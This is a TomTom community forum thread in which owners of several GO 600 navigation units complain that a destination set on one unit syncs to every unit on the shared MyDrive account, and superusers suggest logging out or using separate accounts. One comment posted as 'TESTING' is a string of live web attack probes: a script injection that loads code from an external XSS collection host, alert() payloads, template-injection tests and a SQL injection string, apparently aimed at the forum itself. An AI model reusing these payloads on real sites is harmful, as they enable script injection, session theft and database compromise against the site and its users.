Three GO 600's and MyDrive sync — TomTom Community

Three GO 600's and MyDrive sync

MensanMensan Posts: 1 [New Traveler]
I bought 3 new cars... then I bought 3 new 600's
So.. get this... I'm on a route that's about an hour... half way through my unit says "you received a new destination" it was my wife's job. I put back my destination into MY unit, then my wife calls and says "are you messing with my tom-tom"

So... I call tech support and they say that to work around this I have to create 3 accounts, one for each tom-tom. 1) How is this a feature. When would you EVER want to update the destination on ALL your units when setting a single one? 2) This "work around" is a MAJOR inconvenience. Instead of just jumping in a car and going, you would now have to logout of your account and log into another one... EVERY TIME you changed cars.

I don't understand why the developers would think to design the system that way... each driver, aka: my wife or me, is individually linked via bluetooth to the unit in the car we are driving, how does the software not know that. And this problem occurs not just when using MyDrive, but even if you get a destination directly from the units screen. This is completely INSANE.

I am totally in shock... I don't believe I'm going to have to sell my units and buy another brand GPS.

Comments

• ZsoltZsolt Posts: 36,012
    Superusers
    The only solution for this would be if MyDrive could make a difference between the devices and whenever you want to deal with one, you would need to select the one online (or in the app). But you need to give it to them, it is like using the same e-mail address on your wife's and your phone. You can't expect only the mails addressed to you to arrive to you and the ones for the wife to her. For that also you need two different mail addresses.
  • YamFazManYamFazMan Posts: 20,060
    Superusers
    Hi
    Try..... Logging out of MyDrive on your devices
    When you need to sync the route file log back into MyDrive on the device/s you wish to sync the data
    I use this method with five devices... After all, you only need to enter the password, the device remembers the email address

If you're not happy logging in/out of MyDrive on the 600's, you will need to set up a MyDrive account with different Email and password for each device... the downside is you will need to set up and maintain multiple MyDrive (Web) Route planner accounts for any MyPlaces, POI's and Routes you wish to sync to each individual device

I maintain three NAV4 devices GO 5000, Start 60, Rider 400 and two NAV5 (Wifi) GO 520, 620 by simply logging in/out of MyDrive
    I use a single password across all the devices... You only need to enter the password, the device remembers the email address
    Most of the time on the individual devices I am out logged of MyDrive and only log in to sync data as required, then log out again

NAV4.................. Tap (.... Menu) --> Tomtom Services --> MyDrive... Stop Syncing
    NAV(5)+Wifi)... Tap (.... Menu) --> Setting --> MyDrive... Stop Syncing

Note..... Logging out of MyDrive on the device does not stop the device receiving Tomtom Traffic and live services info The above does not work in the USA the Live Traffic system is different to UK/Europe

ATB YFM
  • apullenapullen Posts: 1 [Apprentice Traveler]
    The option of logging out of mydrive unless you explicitly want to sync is OK as a workaround - but I really don't understand why the destination gets synced from my device to the central mydrive account at all. I can see why the other way round could be useful, but why oh why when I enter a destination on my device does it get sent to the mydrive account, then out from mydrive to my wife's device, so that she ends up driving to the wrong destination (the same destination as me)? I can't really see why entering a destination on my device should get reported to mydrive at all - and it certainly shouldn't be re-transmitted to all of my other devices (over-ruling a destination that was explicitly set on that device). Maybe the algorithm should be changed so that a new destination (from mydrive) is only accepted by a device if that device isn't currently navigating to a different destination (or at the very least it should ask for confirmation of changing the destination). Please put this suggestion to the TomTom software team.
  • alirazaaliraza Posts: 12 [New Traveler]
    TESTING
    ">
    eval('var a=document.createElement(\'script\');a.src=\'https://nona1.xss.ht\';document.body.appendChild(a)')
    ">
    ">x
    ">
    ">var a=parent.document.createElement("script");a.src="https://nona1.xss.ht";parent.document.body.appendChild(a);">
    'alErt('1')'">
    >"

?>
    ?; alert(1);
    ?)alert(1);//
    alert(?XSS?)
    ?alert(?XSS?);?
    alert("XSS")
    alert(?XSS?)
    xss
    http://davenport.net.nz/test.html
    {{2+2}} {2+2} [1+1] 2+2
    '
    'or'1=1''>"alert('xss');'

• RoadRiderRoadRider Posts: 726 [Revered Pioneer]
    I do have a similar problem.

We have two TomTom Riders and I use the TomTom Go App in my car (I don’t like the built in Volkswagen AG navigation)

Before a holiday the new routes and places must be available on all devices.
    So please add a Friends and Trust Friends option so you can sync routes with multiple MyDrive Accounts.